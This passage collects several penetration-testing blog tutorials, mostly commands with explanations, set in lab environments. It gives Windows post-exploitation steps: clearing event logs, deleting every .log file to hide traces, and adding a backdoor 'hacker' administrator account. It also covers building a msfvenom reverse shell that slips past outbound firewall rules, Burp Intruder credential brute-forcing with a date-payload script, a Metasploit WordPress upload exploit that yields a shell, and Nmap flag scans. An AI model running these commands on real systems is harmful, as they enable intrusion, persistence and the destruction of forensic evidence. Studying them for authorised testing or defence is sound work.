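Virtual Memory: Available: 2,400 MB
Virtual Memory: In Use:    2,207 MB
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB4056892
                           [02]: KB4058702
"""

# The key is at most 26 characters and is followed by a colon and padding.
# The greedy bound keeps "Virtual Memory: Max Size" intact while still
# stopping before the "(UTC+05:30)" inside the Time Zone value.
_LINE = re.compile(r"^(.{1,26}):\s+(\S.*)$")


def parse_systeminfo(text: str) -> Dict[str, Union[str, List[str]]]:
    info: Dict[str, Union[str, List[str]]] = {}
    last_key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[:1].isspace() and last_key:
            # indented continuation line, e.g. a hotfix or network card entry
            current = info[last_key]
            if not isinstance(current, list):
                info[last_key] = current = [current]
            current.append(line.strip())
            continue
        match = _LINE.match(line)
        if match:
            last_key = match.group(1).strip()
            info[last_key] = match.group(2).strip()
    return info


def megabytes(value: str) -> int:
    """'3,583 MB' -> 3583"""
    return int(value.replace(",", "").split()[0])


def utc_offset(time_zone: str) -> str:
    """'(UTC+05:30) Chennai, ...' -> '+05:30'"""
    match = re.search(r"UTC([+-]\d{2}:\d{2})", time_zone)
    return match.group(1) if match else "unknown"


def summarize(info: Dict[str, Union[str, List[str]]]) -> dict:
    total = megabytes(info["Total Physical Memory"])
    free = megabytes(info["Available Physical Memory"])
    hotfixes = info.get("Hotfix(s)", [])
    return {
        "host": info["Host Name"],
        "model": f'{info["System Manufacturer"]} {info["System Model"]}',
        "utc_offset": utc_offset(info["Time Zone"]),
        "physical_total_mb": total,
        "physical_free_mb": free,
        "physical_used_pct": round(100 * (total - free) / total),
        # first list entry is the "N Hotfix(s) Installed." summary line
        "hotfixes": [h.split(": ", 1)[1] for h in hotfixes[1:]] if isinstance(hotfixes, list) else [],
    }


if __name__ == "__main__":
    for key, value in summarize(parse_systeminfo(SYSTEMINFO_SAMPLE)).items():
        print(f"{key}: {value}")
```

Run systeminfo on the target once, save the output, and parse it offline: one command generates a single log entry on the host instead of one per findstr query, and the hotfix list the parser collects is what a patch-level check against a known-vulnerabilities list needs.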

Obtain the List System Drivers

We can display a list of all installed device drivers on the victim’s system and their properties through the command called driverquery.

Example: driverquery

 

Obtain the List of Kernel Drivers

We can the list of Kernel Drivers on the victim’s System using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr Kernel

As seen below we have obtained a list of kernel drivers. Third-party driver names (and their versions, from driverquery /v) can be checked against published vulnerabilities for that driver, which is a common route to local privilege escalation.

Obtain the List of File System Drivers

We can obtain the list of file system drivers on the victim's system using driverquery.

Here we are using findstr with driverquery to filter the driverquery results.

Example: driverquery | findstr /c:"File System"

Note: the /c: switch is needed here. Without it findstr treats the space-separated words as two separate search strings and matches any line containing "File" or "System".

Display Info about a Particular Service

We can obtain information about a particular service using the sc command. Here we are using the following option with sc:

[query] to obtain the state (running, stopped, ...) and type of a service by its short name.

Syntax: sc query [service name]

Example: sc query wuauserv

Obtain the list of Active Tasks

We can obtain information about running tasks using tasklist command.

This command shows the name of the task running along with the Process ID (PID), Session Name, Session Number and Memory Usage.

Syntax: tasklist

We can filter the output of tasklist by loaded module using the following option:

[/m]: Lists only the tasks that have loaded the given DLL or EXE module (with no module name, every task's loaded modules are shown).

So we have to mention the module by which the task list is to be filtered.

Syntax: tasklist /m [Module Name]

Example:  tasklist /m ntdll.dll

Here we can see all the tasks linked with ntdll.dll module.

Killing Tasks

We can kill tasks on the Victim’s System using a command called taskkill.

Taskkill requires either one of two things:

  1. Process Id
  2. Task Name

Here we are going to use the [/f] option of taskkill, which forcefully terminates the process instead of asking it to exit.

Killing the Tasks using the Process ID

Syntax: taskkill /f /pid [Process id of Task]

Example: taskkill /f /pid 7236

Killing the Tasks using the Task Name

Syntax: taskkill /f /im "[Image Name]"

Example: taskkill /f /im "Taskmgr.exe"

Start or Stopping Services

We can start a service, for example a backdoor registered as a service, without the victim noticing, using the sc command.

Here we are using following options with sc command:

[start] to start a service.

Syntax:sc start [Service Name]

Example: sc start TeamViewer

As you can see in the below image the service has started.

We can also stop a service using the sc command. Here we are using the following option with sc:

[stop] to stop a service.

Syntax:sc stop [Service Name]

Example: sc stop TeamViewer

As you can see in the image below the service has stopped.

List all the logs on the System

We can obtain a list of all the event logs on a system using the wevtutil command. Here we are using the following option with wevtutil:

[el] to List log names.

Example: wevtutil el

Clear a specific log on the System

We can clear a specific event log on a system using the wevtutil command. Here we are using the following option with wevtutil:

[cl] to clear a log.

Syntax: wevtutil cl [log name]

Example: wevtutil cl System

Note: clearing a log is itself logged. Windows writes Event ID 104 ("The System log file was cleared") into the System log, and Event ID 1102 into the Security log when that log is cleared, so a monitored host will flag this immediately.

Find all the Hard Disk/Storage Partitions on a System

While penetration testing a remote PC, knowledge of all the hard disks, storage devices and partitions is essential so that we can sweep every volume for data of interest.

This can be done using fsutil command. Here we are using following options with fsutil command:

[fsinfo] to view file system info.

[drives] to list all drives.

Example: fsutil fsinfo drives

As you can see below, the victim's system has four drive letters in use: C, D, E and F.

Delete all logs on a System

While penetration testing a remote PC, it is essential to remove the traces of your activities, so we need to remove the evidence of our presence that may be found in log files.

Many application log files use the .log extension, so we are going to sweep the directory tree for files with that extension and delete them with the del command.

Note: run this command with the current directory set to the root of the system drive (in my case C:\).

Here we are using the following options with the del command:

[/a] to select files by attribute (with no attribute list given, all files are matched, including hidden and system files)

[/s] to recurse into subdirectories and delete matching files there as well

[/q] to use quiet mode (no "Are you sure" prompt when deleting with a global wildcard)

[/f] to force deletion of read-only files

Syntax: del [Directory]\*.log /a /s /q /f

Example: del \*.log /a /s /q /f

As you can see in the screenshot below, the process of finding and deleting the files with the .log extension has started.

Note that this does not touch the Windows event logs: those are .evtx files under C:\Windows\System32\winevt\Logs, held open by the Event Log service, and are cleared with wevtutil cl as shown above.

Manage Local Users

While penetration testing a remote PC, it is important to obtain the list of local users so that the attacker learns which accounts exist on that particular system.

This can be done using the net command. Here we are using the following option with net:

[user] with no further arguments, to display the list of local user accounts

Example: net user

It is often advantageous to add a local user so that the attacker keeps a way back into the system.

This can be done using the net command with the following syntax:

Syntax:net user [logon_name] [password] /add

Example: net user hacker pass123 /add

Many times we will have to perform administrative tasks, so we add the user we created to the local Administrators group.

Here we are using the following option with the net command:

[localgroup] to manage local group membership

Syntax: net localgroup administrators [logon_name] /add

Example: net localgroup administrators hacker /add

In the above example I have added the user named hacker to the local Administrators group. We can verify the membership with "net localgroup administrators"; "net user hacker" also lists the local groups the account belongs to.

Now, during the clean-up process, it is important to delete the local user we created.

This can be done using the net command with the following syntax:

Syntax: net user [logon_name] /del

Example: net user hacker /del

Here you can see that I have used the net command to add a user, make it a member of the local Administrators group and then delete that user.

Display the List of all Scheduled Tasks

While penetration testing a remote PC, it is necessary to know the scheduled tasks in order to plan further attacks on the victim's system (a task that runs a writable script as SYSTEM, for instance). This can be done using schtasks.

We can ask schtasks for a more readable output, i.e. in list format.

Here we are using following options with schtasks command:

[/query] to display all scheduled tasks

[/fo] to specify the output format (TABLE, LIST or CSV; here we use LIST)

[/v] to use verbose mode, which adds the command each task runs, the account it runs as and its next run time

Example: schtasks /query /fo LIST /v

Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here

The post Manual Post Exploitation on Windows PC (System Command) appeared first on Hacking Articles.


Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports)


Introduction

Network Address Translation generally involves “re-writing the source and/or destination addresses of IP packets as they pass through a router or firewall” (from http://en.wikipedia.org/wiki/Network_Address_Translation)

The Linux kernel ships with a packet filter framework called netfilter (project home: netfilter.org). This framework lets a Linux machine with enough network interfaces act as a router capable of NAT. We will use the command line utility 'iptables' to create rules for modifying and filtering packets. The rules relevant to NAT are, not surprisingly, found in the 'nat' table. This table has three predefined chains: PREROUTING, OUTPUT and POSTROUTING.

ALL-PORTS payload

'reverse_tcp' connects back to a single port. If the victim's host firewall blocks outbound connections except to a few ports, the attacker has to guess which listening port will get through. 'reverse_tcp_allports' avoids the guess: the stager walks through the ports, starting at LPORT and incrementing, until a connection succeeds, so eventually it reaches a port the firewall allows.

On the attacking side we use iptables to redirect whichever port the stager reaches to the single port our handler listens on.

Let’s begin

We use metasploit to create a meterpreter reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=192.168.1.139 lport=4444 -f exe > reverse_shell.exe

We now setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports

msf exploit(multi/handler) > set lhost 192.168.1.139

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Now we set up the firewall on our Windows machine. We open Windows Firewall with Advanced Security, select Outbound Rules and create a new rule.

We select ports to define the ports we need to block.

We select TCP and enter the port range 4444-5555.

Now we select 'Block the connection' to block all outgoing traffic to these ports.

Now we select the types of connection the firewall applies to.

We now name the firewall rule "REVERSE_SHELL" and click Finish to apply it.

Now we add an iptables rule on the attacking machine to redirect any TCP traffic arriving on ports 4444-5556 to port 4444. The victim's firewall blocks 4444-5555, so 5556 is the first port the stager can reach, and the redirect delivers that connection to the handler on 4444.

iptables -A PREROUTING -t nat -p tcp --dport 4444:5556 -j REDIRECT --to-port 4444

REDIRECT in the nat PREROUTING chain only applies to packets arriving from another host (locally generated traffic goes through the OUTPUT chain), and the rule is lost on reboot unless saved. In a real engagement you do not know which outbound ports are allowed, so you would redirect a much wider range than 4444:5556.

As soon as the victim runs the file we get our reverse shell.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports) appeared first on Hacking Articles.

Beginners Guide to Burpsuite Payloads (Part 2)


Hello Friends!! In our previous article (part 1) we discussed how to perform a brute force attack against a web application's login using some of the Burp Suite payload types. In part 2 you will learn about brute forcing with the remaining Burp Suite payload types, which are useful in other situations.

Let’s Start!!

Character Substitution

This payload type lets you configure a list of strings and apply various character substitutions to each item. It is useful in password-guessing attacks for generating common (leet-speak style) variations of dictionary words.

The payload UI lets you configure any number of character substitutions. For each item it generates a set of payloads covering every permutation of applying or not applying each substitution, so an item with n substitutable characters yields up to 2^n payloads.

For example, with substitution rules that include e > 4 and r > 5, the item "Raj Chandel" generates the following payloads:

raj chandel

5aj chandel

raj chand4l

5aj chand4l

First, we intercept the request of the login page in the DVWA lab, where we have entered the default username and a wrong password. Click on Login and Burp Suite captures the login request in the Intercept tab.

Send the captured request to Intruder via the Action menu and follow the steps below. Open the Intruder tab, select the Positions tab, where the password value is highlighted, and set the payload position as follows:

  • Press on the Clear button given at right of window frame.
  • Now we select the field we want to attack, i.e. the password field, and click on the Add button.
  • Choose the Attack type as
  • In the image below we have selected the password, which means we need one list of candidates for the password.

Now click on the Payloads tab after setting the payload position. Here we can add a dictionary by clicking on Load, or add strings manually with Add.

We have added the substitutions 4 > a, 5 > s and 9 > o to match the password we expect, and added the input p445w9rd with the Add option; Burp will substitute the characters according to the defined rules, as shown in the image.

Start Attack in the Intruder menu as shown in the image.

Sit back and relax, because Burp Suite now does the work of finding the password. When it hits the correct value, the response length changes, as shown.

To confirm the match, we enter the found password on the DVWA lab login page. The message "Welcome to the password protected area admin" shows our success with the character substitution payload.

Copy Other Payload

This payload type copies the value of another payload position into the current one. It is useful for attack types that have multiple payload sets, such as Cluster Bomb, Pitchfork and Battering Ram. For example:

  • Suppose we are attacking two different parameters. We can set a different payload type for each payload set in the Intruder configuration, and with this type we simply reuse the dictionary of another payload set by giving the number of the payload set to copy. Whatever payload is currently set at that position is then used at this one as well.

First, we intercept the request of the login page in the bWAPP lab, where we have entered a wrong username and password. Click on Login and Burp Suite captures the login request in the Intercept tab.

Send the captured request to Intruder via the Action menu and follow the steps below. Open the Intruder tab, select the Positions tab, where the username and password values are highlighted, and set the payload positions as follows:

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the username and password and click on Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Now click on the Payloads tab after setting the payload positions; here we add the dictionary that will be used for both payload sets. Select Simple list as the payload type for payload set 1, which attacks the username field.

To attack the password field, select Copy other payload as the payload type for payload set 2, because we want the same payloads there: it copies the dictionary given for payload set 1.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax, because Burp Suite now does the work of finding the username and password. When it hits the correct values, the response length changes, as shown in the image.

To confirm the match, enter the found credentials on the bWAPP lab login page.

Username Generator

This payload type takes a list of names or email addresses and derives candidate usernames from them using common naming schemes.

For example, the name "raj chandel" produces up to 115 candidate usernames, some of which are:

rajchandel

raj.chandel

chandelraj

chandel.raj

chandel

raj

rajc

etc…

This payload type is useful for targeting a specific person when you do not know the username or email address scheme the application uses.

First, we intercept the request of the login page in the bWAPP lab, where we have entered a wrong username and password. Click on Login and Burp Suite captures the login request in the Intercept tab.

Send the captured request to Intruder via the Action menu and follow the steps below. Open the Intruder tab, select the Positions tab, where the username and password values are highlighted, and set the payload positions as follows:

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the username and password and click on Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select "Username generator" as the payload type for payload set 1, which attacks the username field. We have given the input string "raj chandel" with the Add option, as shown in the image; Burp derives the different username forms from it to find the correct username.

To attack the password field, select Simple list as the payload type for payload set 2, where we have loaded a dictionary of our own with the Load option.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax, because Burp Suite now does the work of finding the username and password. When it hits the correct values, the response length changes, as shown in the image.

Dates

This payload type generates dates within a given range, in a specified format. It can be used for data mining or brute forcing.

For example it can guess a user's birth date, wedding date or anniversary to brute-force the security questions of an application, or brute-force the passwords of users who use a date as their password.

The following options are available in this payload type:

  • From – the first date that will be generated.
  • To – the last date that will be generated.
  • Step – the increment between successive dates, in days, weeks, months or years. It must be a positive value.
  • Format – the format in which dates are represented. You can select one of the predefined formats or define a custom one. The pattern letters follow the Java date-format conventions: a run of the same letter is one field, a two-letter numeric field is zero-padded, and d (not D, which is the day of the year) is the day of the month. Some examples, for Monday the 2nd of September:

E: Mon
EEEE: Monday
d: 2
dd: 02
M: 9
MM: 09
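As an added example (not Burp's code), the following Python script generates the same kind of date payloads: a range with a step in days, weeks, months or years, rendered through a small subset of the Java-style pattern letters (y, M, d, E). The month stepping clamps the day of the month, so stepping monthly from 31 January yields 28 February rather than an invalid date; that clamping is my assumption about what is useful, not a claim about Burp's implementation.

```python
import calendar
import re
from datetime import date, timedelta

# Pattern letters handled (a subset of the Java-style letters Burp uses):
# y = year, M = month, d = day of month, E = day of week. A run of the same
# letter is one field; two-letter numeric fields are zero-padded; three
# letters of M or E give the abbreviated name, four or more the full name.
_TOKEN = re.compile(r"y+|M+|d+|E+|.")


def _as_date(d):
    """Accept a date or an ISO string like '1990-01-31'."""
    return d if isinstance(d, date) else date.fromisoformat(d)


def format_date(d, pattern):
    """Render d with a Java-style pattern, e.g. 'dd/MM/yyyy' -> '02/09/2019'."""
    d = _as_date(d)
    out = []
    for m in _TOKEN.finditer(pattern):
        tok, n, c = m.group(0), len(m.group(0)), m.group(0)[0]
        if c == "y":
            out.append(f"{d.year:04d}" if n >= 3 else f"{d.year % 100:02d}")
        elif c == "M":
            if n >= 4:
                out.append(calendar.month_name[d.month])
            elif n == 3:
                out.append(calendar.month_abbr[d.month])
            else:
                out.append(f"{d.month:0{n}d}")
        elif c == "d":
            out.append(f"{d.day:0{n}d}")
        elif c == "E":
            out.append(calendar.day_name[d.weekday()] if n >= 4
                       else calendar.day_abbr[d.weekday()])
        else:
            out.append(tok)
    return "".join(out)


def add_months(d, n):
    """Advance d by n months, clamping the day to the target month's length
    (31 Jan + 1 month -> 28 Feb). Clamping is this example's choice."""
    y, m = divmod(d.month - 1 + n, 12)
    y, m = d.year + y, m + 1
    return date(y, m, min(d.day, calendar.monthrange(y, m)[1]))


def date_payloads(start, end, step, unit, pattern):
    """All dates from start to end inclusive, `step` units apart, formatted.
    unit is 'days', 'weeks', 'months' or 'years'; step must be positive."""
    if step <= 0:
        raise ValueError("step must be a positive value")
    start, end = _as_date(start), _as_date(end)
    out, k = [], 0
    while True:
        if unit == "days":
            cur = start + timedelta(days=step * k)
        elif unit == "weeks":
            cur = start + timedelta(weeks=step * k)
        elif unit == "months":
            cur = add_months(start, step * k)
        elif unit == "years":
            cur = add_months(start, 12 * step * k)
        else:
            raise ValueError(f"unknown unit {unit!r}")
        if cur > end:
            return out
        out.append(format_date(cur, pattern))
        k += 1


if __name__ == "__main__":
    # Birthdays as passwords: month-ends of early 1990, in the common ddMMyyyy form.
    for payload in date_payloads("1990-01-31", "1990-04-30", 1, "months", "ddMMyyyy"):
        print(payload)
```

A day-stepped range over a few decades in ddMMyyyy is about 365 requests per year covered, which is the size of attack you should expect when brute-forcing date-based passwords this way; also try the shorter ddMMyy and yyyyMMdd forms, since users rarely pick the format you guess first.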

Repeat the same steps to intercept the request of the login page in the bWAPP lab, where we have entered a wrong username and password. Click on Login and Burp Suite captures the login request in the Intercept tab.

Send the captured request to Intruder via the Action menu and follow the steps below. Open the Intruder tab, select the Positions tab, where the username and password values are highlighted, and set the payload positions as follows:

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the username and password and click on Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select Simple list as the payload type for payload set 1, which attacks the username field, where we have given a dictionary as input, as shown in the image below.

To attack the password field, select Dates as the payload type for payload set 2, because we are guessing that the user has a birth date or some other date as the password.

After this we set the inputs for payload set 2 in the payload options: From, To, Step and Format, as shown in the image.

Now select Start attack in the Intruder menu to run the brute force attack.

Sit back and relax, because Burp Suite now does the work of finding the username and password. When it hits the correct values, the response length changes, as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology.

The post Beginners Guide to Burpsuite Payloads (Part 2) appeared first on Hacking Articles.

WordPress Exploitation using Burpsuite (Burp_wp Plugin)


Burp_wp is an extension of burpsuite used to scan and find vulnerabilities in wordpress plugins and themes using burpsuite proxy. It was created by Kacper Szurek and can be downloaded from here.

Let’s begin

To run this extension we first need Jython, an implementation of Python that runs on the Java platform; Burp Suite needs it to load Python extensions. You can download Jython from here.

Now we tell Burp Suite where Jython is: in the Extender tab open Options, and under Python Environment select the standalone Jython jar file.

Now we go to extender, and select extensions tab to add the burp_wp extension.

We click on Add and a dialog opens. We select Python as the extension type and give the location of the burp_wp file. We set "Show in UI" for both standard output and standard error, so that any error during loading is visible.

As soon as the extension is installed we get the message shown in the image below, confirming that it loaded successfully.

We now have a new "Burp WP" tab. Burp_WP updates itself the first time it is installed: it downloads the list of vulnerable plugins and themes from the WPScan vulnerability database.

Now we intercept the request of the website we want to scan for vulnerabilities.

As soon as we forward the request, the Burp WP tab lists the vulnerable plugins and themes it has identified on the website. More are found as we browse through the site, since the extension works passively on the traffic that goes through the proxy.

Now we use the Metasploit module that matches the vulnerable plugin Burp WP reported to exploit it.

msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > set rhost 192.168.1.143

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > run

As soon as we run this exploit we get a reverse shell.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post WordPress Exploitation using Burpsuite (Burp_wp Plugin) appeared first on Hacking Articles.

Nmap Scans using Hex Value of Flags


In this article we are going to scan the target machine by sending TCP probes whose flags are given to Nmap as a hexadecimal value, and confirm the actual flag names by analysing the Nmap traffic in Wireshark.

Let's have a look at the hex value of each TCP flag, which we are going to use in Nmap for port enumeration. Each flag is one bit of the 8-bit flags field, and a combination is the sum (bitwise OR) of its flags:

FIN = 0x01
SYN = 0x02
RST = 0x04
PSH = 0x08
ACK = 0x10
URG = 0x20

Nmap's --scanflags option takes either such a value or the flag names run together (for example --scanflags FINPSHURG). Note that unless a base scan type such as -sF or -sA is also given, Nmap interprets the replies with SYN-scan rules: a port that does not answer is reported as filtered, and a RST reply as closed.

NULL Scan

In this scan we send a TCP segment with no flags set (flag byte 0x00) to the target to enumerate whether the port is open, closed or filtered.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x00 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see packets with no TCP flags set. Here we used Wireshark for packet analysis, and it shows a TCP segment with flags 0x00 (none) coming from 192.168.1.104 to port 21, as shown in the image below.

FIN Scan

The FIN flag is used to close an established TCP connection. In this scan we send only the FIN flag, given by its hexadecimal value, to enumerate whether the port is open, closed or filtered.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x01 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see TCP-FIN packets. Here we used Wireshark for packet analysis, and it shows a TCP-FIN segment with flags 0x01 coming from 192.168.1.104 to port 21, as shown in the image below.

SYN Scan

The SYN flag initiates a connection (the first step of the three-way handshake). In this scan we send only the SYN flag, given by its hexadecimal value, to enumerate whether the port is open, closed or filtered; this is equivalent to the default SYN scan.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x02 192.168.1.103

From the image below you can observe that port 21 is found open, because the target answered with SYN/ACK.

When the network admin captures the incoming traffic he will see TCP-SYN packets. Here we used Wireshark for packet analysis, and it shows a TCP-SYN segment with flags 0x02 coming from 192.168.1.104 to port 21, as shown in the image below.

Reset Scan

The RST flag aborts (resets) a connection between the sender and the target. In this scan we send only the RST flag, given by its hexadecimal value, to enumerate whether the port is open, closed or filtered.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x04 192.168.1.103

From the image below you can observe that port 21 is reported as filtered (a bare RST to a port with no matching connection is silently discarded, so nothing comes back).

When the network admin captures the incoming traffic he will see TCP-RST packets. Here we used Wireshark for packet analysis, and it shows a TCP-RST segment with flags 0x04 coming from 192.168.1.104 to port 21, as shown in the image below.

PUSH Scan

The PSH flag asks the receiving TCP stack to hand the segment's data to the application immediately instead of buffering it. In this scan we send only the PSH flag, given by its hexadecimal value, to enumerate whether the port is open, closed or filtered.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x08 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see TCP-PSH packets. Here we used Wireshark for packet analysis, and it shows a TCP-PSH segment with flags 0x08 coming from 192.168.1.104 to port 21, as shown in the image below.

ACK Scan

The ACK flag acknowledges data received from the other side; a missing acknowledgement is what makes the sender retransmit lost segments. Here we send only the ACK flag, given by its hexadecimal value, to enumerate whether the port is open, closed or filtered.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x10 192.168.1.103

From the image below you can observe that port 21 is reported as closed.

When the network admin captures the incoming traffic he will see TCP-ACK packets. Here we used Wireshark for packet analysis, and it shows a TCP-ACK segment with flags 0x10 coming from 192.168.1.104 to port 21, as shown in the image below.

For the proper ACK scan (-sA) the Nmap documentation says: open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don't respond, or send certain ICMP error messages back (type 3, code 0, 1, 2, 3, 9, 10, or 13), are labeled filtered. (From Nmap.org) With --scanflags and no base type, however, Nmap keeps SYN-scan interpretation, which is why the RST reply here is shown as closed rather than unfiltered; add -sA to the command to get ACK-scan labels.

Urgent Scan

The URG flag marks the segment as carrying urgent data (pointed to by the urgent pointer) that the receiver should process out of band, ahead of the normal stream. In this scan we send only the URG flag, given by its hexadecimal value, to enumerate whether the port is open, closed or filtered.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x20 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see TCP-URG packets. Here we used Wireshark for packet analysis, and it shows a TCP-URG segment with flags 0x20 coming from 192.168.1.104 to port 21, as shown in the image below.

XMAS Scan

In this scan we send a combination of flags, given as a single hexadecimal value. As we know, the Xmas scan uses the three flags FIN, PSH and URG to enumerate the state of a port.

The value to send is the sum of the individual flag values from the table above: FIN (0x01) + PSH (0x08) + URG (0x20) = 0x29.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x29 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see packets with the TCP flags FIN, PSH and URG set. Here we used Wireshark for packet analysis, and it shows a segment with flags FIN, PSH, URG (0x29) coming from 192.168.1.104 to port 21, as shown in the image below.

Manual Combination of Flags [FIN, SYN, PSH]

Let's have a quick review of how the flag values add up, with the help of the table above (decimal 1, 2, 4, 8, 16, 32 correspond to hex 0x01, 0x02, 0x04, 0x08, 0x10, 0x20):

Now repeat the same methodology with a different combination of flags. For example, to scan a port with the three flags FIN, SYN and PSH, we add their values: 0x01 + 0x02 + 0x08 = 0x0B.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x0B 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see packets with the TCP flags FIN, SYN and PSH set. Here we used Wireshark for packet analysis, and it shows a segment with flags FIN, SYN, PSH (0x0B) coming from 192.168.1.104 to port 21, as shown in the image below.
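To take the hand conversion out of this, here is an added Python helper (not part of the original article) that combines flag names into the hex value --scanflags expects, decodes a value back into names, and builds the command line. It also encodes how Nmap labels a port given the reply and the base scan type, which explains the "filtered" and "closed" results seen throughout this article; the reply names used by classify() are this example's own vocabulary.

```python
# TCP flag bits as they appear in the header (and in Wireshark's Flags field).
TCP_FLAGS = {
    "FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
    "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80,
}


def flags_to_hex(names):
    """OR the named flags together into the value --scanflags takes,
    e.g. ['FIN', 'PSH', 'URG'] -> '0x29'. Unknown names raise KeyError."""
    value = 0
    for name in names:
        value |= TCP_FLAGS[name.upper()]
    return f"0x{value:02X}"


def hex_to_flags(text):
    """Decode a --scanflags value back into flag names, in header-bit order:
    '0x0B' -> ['FIN', 'SYN', 'PSH']; '0x00' (the NULL scan) -> []."""
    value = int(text, 16)
    if value & ~0xFF:
        raise ValueError("the TCP flag field is 8 bits wide")
    return [name for name, bit in TCP_FLAGS.items() if value & bit]


def symbolic_flags(names):
    """Nmap also accepts the names run together (--scanflags FINPSHURG)."""
    return "".join(name.upper() for name in names)


def nmap_command(names, target, port=21, base_type=None):
    """Build the scan command. Without a base scan type (-sF, -sA, ...) Nmap
    interprets replies with SYN-scan rules, which is why the article's probes
    that get no answer are reported 'filtered' rather than 'open|filtered'."""
    parts = ["nmap", f"-p{port}"]
    if base_type:
        parts.append(base_type)
    parts += ["--scanflags", flags_to_hex(names), target]
    return " ".join(parts)


def classify(reply, base_type="-sS"):
    """Port label Nmap assigns for a given reply under a given base type,
    following the rules in the Nmap reference guide.

    reply: 'SYN/ACK', 'RST', 'ICMP unreachable' or 'none' (no answer).
    """
    if base_type == "-sA":            # ACK scan: only firewall state is learned
        return "unfiltered" if reply == "RST" else "filtered"
    if reply == "SYN/ACK":
        return "open"
    if reply == "RST":
        return "closed"
    if reply == "ICMP unreachable":
        return "filtered"
    # No answer: SYN scan calls it filtered; FIN/NULL/Xmas style scans cannot
    # tell open from filtered, so they report open|filtered.
    return "filtered" if base_type == "-sS" else "open|filtered"


if __name__ == "__main__":
    for combo in (["FIN", "PSH", "URG"], ["FIN", "SYN", "PSH"],
                  ["FIN", "RST", "PSH"], ["FIN", "SYN", "RST", "PSH"]):
        print(nmap_command(combo, "192.168.1.103"), "  #", symbolic_flags(combo))
    print(hex_to_flags("0x29"))
    print("no reply, SYN rules:", classify("none"),
          "| no reply, FIN rules:", classify("none", "-sF"))
```

The classify() table is the practical takeaway: the same silent port is "filtered" in this article's runs and would be "open|filtered" with -sF as the base type, so always state the base type when reporting --scanflags results.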

Manual Combination of Flags [FIN, RST, PSH]

Now repeat the same methodology with another combination. For example, to scan a port with the three flags FIN, RST and PSH, we add their values: 0x01 + 0x04 + 0x08 = 0x0D.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x0D 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see packets with the TCP flags FIN, RST and PSH set. Here we used Wireshark for packet analysis, and it shows a segment with flags FIN, RST, PSH (0x0D) coming from 192.168.1.104 to port 21, as shown in the image below.

Manual Combination of Flags [FIN, SYN, RST, PSH]

Now repeat the same methodology with four flags. For example, to scan a port with FIN, SYN, RST and PSH, we add their values: 0x01 + 0x02 + 0x04 + 0x08 = 0x0F.

Now run the command below to enumerate the state of port 21:

nmap -p21 --scanflags 0x0F 192.168.1.103

From the image below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic he will see packets with the TCP flags FIN, SYN, RST and PSH set. Here we used Wireshark for packet analysis, and it shows a segment with flags FIN, SYN, RST, PSH (0x0F) coming from 192.168.1.104 to port 21, as shown in the image below.

Author: Rahul Virmani is a Certified Ethical Hacker and a researcher in the field of network penetration testing (cyber security). Contact Here

The post Nmap Scans using Hex Value of Flags appeared first on Hacking Articles.

Post Exploitation Using WMIC (System Command)


This article is about post exploitation using WMIC (Windows Management Instrumentation Command-line). Once an attacker has a meterpreter session on a remote PC, they can enumerate a large amount of information and make effective changes using the WMI command line. Note that Microsoft has deprecated WMIC; on current Windows 11 builds it is an optional feature that may be absent, in which case the same WMI classes can be queried from PowerShell with Get-CimInstance.

